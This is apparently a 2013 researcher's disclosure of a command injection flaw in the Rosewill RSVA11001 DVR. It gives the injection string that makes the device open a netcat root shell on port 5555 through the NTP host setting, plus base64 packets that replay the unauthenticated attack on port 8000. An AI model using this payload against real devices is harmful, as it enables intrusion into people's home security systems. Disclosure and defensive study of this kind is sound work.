Remote Command Injection Vulnerability in Rosewill RSVA11001

The Rosewill RSVA11001 is a home security DVR. I bought one and of course was not content to use it for its original purpose. It's based on a Huawei Hi3515. I downloaded the firmware and with the help of binwalk ripped it apart. The firmware is a confusing mess of different file system types and multiple linux kernels.

I wanted to find a way to get a root shell on the device. Included with the device is a CD with some Windows based monitoring software. Inspection of the firmware revealed an executable hi_dvr that runs on the device and listens on TCP Port 8000 for control commands and on TCP Port 9000 to stream video. Using the strings command on the executable I found this gem

/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp

So I used the windows management software to set the NTP host to

a;/usr/bin/nc -l -p 5555 -e /bin/sh&

Next I power cycled the box and a shell was waiting a minute later on port 5555. Of course, the hi_dvr executable runs as root so you gain root privilieges with this method. By default it runs this command on startup and once a day thereafter.

As it turns out, the "authentication" done on the command port is just a charade to the user of the management software. Other security researchers had previously identified this. You only need to replay the packets below to exploit the vulnerable shell execution

The box is not very interesting once you are in. It's a linux 2.6.24 kernel with RT patches and busy box user space. I don't have access to the SDK for the Hi3515 (different than Hi3511). The kernel modules for Video Input, Video Output, Audio Output, H264 encoding, etc. are there but in binary only (non stripped) form. You could probably do some cool hacking on this box as it has two SATA ports inside.

Packets

Here are the base64 encodings of the packets I captured while conducting the exploit. You'll need to convert them from base64 and replay them with something like nc into a TCP connection to port 8000.

This packet sets the NTP host to the shell escape sequence

UkVNT1RFIEhJX1NSREtfVElNRV9TZXRUaW1lU2V0QXR0ciBNQ1RQLzEuMA0KQ1NlcTo2Ng0KQWNj
ZXB0OnRleHQvSERQDQpDb250ZW50LVR5cGU6dGV4dC9IRFANCkZ1bmMtVmVyc2lvbjoweDEwDQpD
b250ZW50LUxlbmd0aDoxMjQNCg0KU2VnbWVudC1OdW06MQ0KU2VnbWVudC1TZXE6MQ0KRGF0YS1M
ZW5ndGg6NzYNCg0KAQAGAWE7L3Vzci9iaW4vbmMgLWwgLXAgNTU1NSAtZSAvYmluL3NoAA4jAQBA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

This second request to the same port is required to cause the device to save the changes to its flash storage.

UkVNT1RFIEhJX1NSREtfREVWX1NhdmVGbGFzaCBNQ1RQLzEuMA0KQ1NlcTo0MQ0KQWNjZXB0OnRl
eHQvSERQDQpDb250ZW50LVR5cGU6dGV4dC9IRFANCkZ1bmMtVmVyc2lvbjoweDEwDQpDb250ZW50
LUxlbmd0aDoxNQ0KDQpTZWdtZW50LU51bTowDQo=

Other vulnerable units

The Rosewill RSVA12001 is the same unit with different supplied cameras and should have the same vulnerability.


© Eric Urban 2013